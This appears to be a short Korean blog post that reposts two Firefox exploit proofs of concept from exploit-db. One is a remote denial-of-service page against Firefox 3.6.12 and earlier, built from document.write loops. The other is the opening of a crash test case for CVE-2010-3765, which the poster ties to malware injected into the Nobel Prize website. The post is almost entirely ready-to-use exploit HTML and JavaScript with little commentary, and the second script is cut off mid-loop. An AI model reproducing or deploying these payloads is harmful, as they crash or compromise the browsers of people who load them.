최근에 Firefox 취약점이 자주 나오네요.. 불안하게 -_- 출처 : http://www.exploit-db.com/exploits/15498/ <!– 0day Mozilla Firefox <= 3.6.12 Remote Denial Of Service Credits: Emanuele 'emgent' Gentili <[email protected]> Marco 'white_sheep' Rondini <[email protected]> Alessandro 'scox' Scoscia <[email protected]> –> <script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script> <script> var i=0; for (i=0;i<=19999;i++) { document.write("a"); } for (i=0;i<=3;i++) { document.write(document.body.innerHTML); } </script>
Firefox Interleaving document.write and appendChild Denial of Service – CVE-2010-3765
최근 노벨상 사이트에 삽입된 악성코드와 관련된 코드 입니다. 출처 : http://www.exploit-db.com/exploits/15341/ <html><body> <script> function getatts(str){ var cobj=document.createElement(str); cobj.id="testcase"; document.body.appendChild(cobj); var obj=document.getElementById("testcase"); var atts = new Array(); for(p in obj){ if(typeof(obj[p])=="string"){ atts.push(p); } } document.body.removeChild(cobj); return atts; } function crashme() { var tags = new Array("audio", "a", "base"); for (inx = 0; inx < 0x8964; inx++) …